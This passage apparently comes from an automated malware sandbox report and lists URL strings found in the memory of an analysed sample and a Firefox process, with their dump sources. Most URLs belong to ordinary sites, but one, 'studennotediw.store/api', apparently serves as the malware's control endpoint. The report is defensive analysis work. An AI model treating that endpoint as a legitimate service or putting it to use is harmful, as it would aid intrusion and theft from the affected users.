Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/mobile
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107599445.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2133071167.00000000010D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107634315.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/news/
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107599445.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2133071167.00000000010D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107634315.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/points/shop/
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107599445.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2133071167.00000000010D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107634315.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/stats/
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: 976d9f40c1.exe, 0000000B.00000003.2921635801.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://studennotediw.store:443/api
Source: firefox.exe, 00000019.00000002.3179268401.000001379A0A2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3262272716.00000137A88F4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3181915988.000001379A8B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3193146359.000001379C9C0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
Source: firefox.exe, 00000019.00000002.3268801585.00000137A92F6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3236681244.00000137A107C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3074602555.00000137A92F6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/
Source: file.exe, 00000000.00000003.2134472966.0000000005CBD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3267319555.00000137A91E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/firefox-crashes-troubleshoot-prevent-and-get-helphttps://support.mozi
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3235672000.00000137A0FB4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settingsUnable
Source: file.exe, 00000000.00000003.2134472966.0000000005CBD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: firefox.exe, 00000019.00000002.3179268401.000001379A0A2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DDDC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://truecolors.firefox.com
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A925000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://watch.sling.com/
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A9E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3233387632.00000137A0C62000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3256678310.00000137A6497000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.aliexpress.com/
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3026487820.00000137A6A2D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3256678310.00000137A6497000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.co.uk/
Source: file.exe, 00000000.00000003.2147753615.0000000005A5A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3178406027.0000013799FAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3157667654.000001804BECB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: firefox.exe, 00000019.00000003.2975681250.000001379E91D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3207818517.000001379EC1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2977256992.000001379E98A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2976232127.000001379E938000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3258641939.00000137A6981000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3220295992.00000137A0106000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3205276843.000001379E800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A925000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2974846355.000001379E700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2976412933.000001379E953000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2976574533.000001379E96F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: file.exe, 00000000.00000003.2147753615.0000000005A5A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3178406027.0000013799FAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3157667654.000001804BECB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: file.exe, 00000000.00000003.2094931339.000000000107E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2094889804.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2094931339.0000000001066000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: file.exe, 00000000.00000003.2094931339.000000000107E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/lear
Source: file.exe, 00000000.00000003.2094931339.000000000108F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: file.exe, 00000000.00000003.2108201890.00000000059D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2108149493.00000000059D4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2108287783.00000000059D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3016636539.00000137A6189000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3256678310.00000137A6497000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search
Source: firefox.exe, 00000019.00000003.2975681250.000001379E91D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2977256992.000001379E98A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3047116966.00000137A62B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2976232127.000001379E938000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3205276843.000001379E800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000003.2974846355.000001379E700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2976412933.000001379E953000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2976574533.000001379E96F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3037293440.00000137A62BA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: file.exe, 00000000.00000003.2108201890.00000000059D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2108149493.00000000059D4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2108287783.00000000059D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/recaptcha/
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3207818517.000001379EC1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3236681244.00000137A10D4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A9E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3178406027.0000013799F45000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2977256992.000001379E98A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3047116966.00000137A62B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3037293440.00000137A62B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2976232127.000001379E938000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3220295992.00000137A0106000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3205276843.000001379E800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A925000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2974846355.000001379E700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2976412933.000001379E953000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2976574533.000001379E96F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3258641939.00000137A6961000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3256678310.00000137A6497000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3258641939.00000137A698F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3080579701.00000137A1B98000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3204056198.000001379E698000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3258641939.00000137A699D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3034748232.00000137A699D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3258641939.00000137A697C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=
Source: 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3205276843.000001379E800000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.hulu.com/watch/
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3205276843.000001379E800000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.instagram.com/
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3026487820.00000137A6A2D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3256678310.00000137A6497000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.leboncoin.fr/
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3212088347.000001379F3F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mobilesuica.com/
Source: firefox.exe, 00000019.00000002.3258641939.00000137A69E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3181915988.000001379A807000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3273600279.00002250CC504000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3262272716.00000137A88F4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3179268401.000001379A0B1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3258641939.00000137A69DC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3179268401.000001379A003000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3258641939.00000137A697C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3193146359.000001379C9C0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/about/legal/terms/subscription-services/
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/about/legal/terms/subscription-services/firefox-desktop-password-au
Source: file.exe, 00000000.00000003.2134472966.0000000005CBD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3267319555.00000137A91E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3028904621.00000137A8F33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3026895812.00000137A8F35000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
Source: file.exe, 00000000.00000003.2134472966.0000000005CBD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3267319555.00000137A91E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: file.exe, 00000000.00000003.2134472966.0000000005CBD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3267319555.00000137A91E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000003.2134472966.0000000005CBD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3267319555.00000137A91E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/new/
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/new/resource://gre/modules/KeywordUtils.sys.mjsresource://gre/module
Source: file.exe, 00000000.00000003.2134472966.0000000005CBD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3267319555.00000137A91E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3178406027.0000013799F54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3157667654.000001804BECB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
Source: file.exe, 00000000.00000003.2134472966.0000000005CBD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3267319555.00000137A91E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A925000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.sling.com/
Source: file.exe, 00000000.00000003.2201148750.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2151059602.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147845498.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2151283183.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107599445.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2133071167.00000000010D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236560303.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2167545129.00000000010D5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107634315.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2250494766.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803112102.00000000016E5000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000173D000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803355226.00000000016E9000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2921635801.0000000000EC9000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2922291793.0000000000ECB000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com
Source: 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3257901918.00000137A6715000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A9E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3258641939.00000137A69FA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3233387632.00000137A0C62000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3257901918.00000137A67B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3204056198.000001379E616000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3216319833.000001379FE03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3272561632.00000E3FE0E00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3256678310.00000137A6497000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3044193469.00000137A67B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3190977746.000001379C4DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3084260888.00000137A1B62000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3240318696.00000137A1B62000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3272739048.00000F92B5563000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3207818517.000001379EC1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3220295992.00000137A01FB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3236681244.00000137A10D4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3112035242.00000137A02B7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3044193469.00000137A67A0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3234717923.00000137A0E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A9E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3178406027.0000013799F45000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3234717923.00000137A0E9B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3101120989.00000137A02B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3109478738.00000137A0372000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3087918293.00000137A0372000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 